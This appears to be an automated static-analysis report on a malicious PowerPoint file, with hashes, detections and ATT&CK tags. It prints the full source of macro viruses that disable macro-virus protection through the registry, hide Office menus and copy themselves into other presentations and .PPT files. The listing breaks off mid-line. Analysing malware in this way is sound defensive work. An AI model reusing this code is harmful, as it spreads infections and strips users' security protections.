Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 860f5a7cb2564392…

MALICIOUS

Office (OLE)

24.5 KB Created: 2003-12-26 11:34:38 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 3cf8ea391f613a7f833947b73da9f520 SHA-1: 415169659ab7bc4b8fb2e8ac377d2d2ae3b15761 SHA-256: 860f5a7cb2564392a36446eb791ba9d91f39cfb1954deb723d7116de22380b90
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a PowerPoint file containing VBA macros that attempt to disable macro security by writing to the registry key HKCU\Software\Microsoft\Office\8.0\PowerPoint\Options. It also exports its own VBA code to 'C:\CONFIG.LAC' and creates a registry file 'c:\power.reg'. The embedded URL 'http://www.nod32.com.au/' is present but has an unknown reputation. The primary intent appears to be self-propagation and evasion of security controls.

Heuristics 4

  • ClamAV: Win.Trojan.PPT97-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PPT97-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.nod32.com.au/ In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4272 bytes
SHA-256: 8b936a64ab19fde3e62f3d7d306bf588f56b8f37534a9df8378cb818d7c3abb9
Detection
ClamAV: Win.Trojan.PP97M-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With

With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub

Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With

With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub

Attribute VB_Name = "Module1"
Const OurAmy = "Amy"
Public SlideAmy As Object
'----------------------------------------------------------------
'PPT.Amy.a
'By -KD- [Metaphase VX Team & NoMercyVirusTeam]
'Greets to Raven, KidCypher, Error-, Foxz, Evul, Roadkil, Tally
'JFK, Slagehammer, AngelsKitten, BSL4, Antistate and #virus
'----------------------------------------------------------------
Sub A\(Amy): On Error Resume Next
If Dir(Application.Path & ".VXD") = "" Then _
ActivePresentation.VBProject.VBComponents(OurAmy).Export Application.Path & ".VXD"
For Each SlideAmy In Presentations
CatchAmy
Next
With Application.FileSearch
 .LookIn = ActivePresentation.Path
 .FileName = "*.PPT"
 .SearchSubFolders = True
 .Execute
 For MyAmy = 1 To .FoundFiles.Count
If .FoundFiles(MyAmy) = ActivePresentation.FullName Then GoTo CatchThis
 Set SlideAmy = Presentations.Open(.FoundFiles(MyAmy))
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
 Call CatchAmy
 SlideAmy.Save
End If
SlideAmy.Close
CatchThis Next
End With
End Sub
Private Sub CatchAmy()
On Error Resume Next
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
 SlideAmy.VBProject.VBComponents.Import Application.Path & ".VXD"
 For Each AmyAction In SlideAmy.Slides(SlideAmy.Slides.Count).Shapes
If AmyAction.ActionSettings(ppMouseOver).Action = 0 Then
AmyAction.ActionSettings(ppMouseOver).Action = ppActionRunMacro
AmyAction.ActionSettings(ppMouseOver).Run = "A\"
If Day(Date) = "1" Or Day(Date) = "25" Then
Assistant.Visible = True
  With Assistant.NewBalloon
   .Icon = msoIconAlert
   .Text = "Here I am again. again overwhelming feelings. thousand miles away. part of
... (truncated)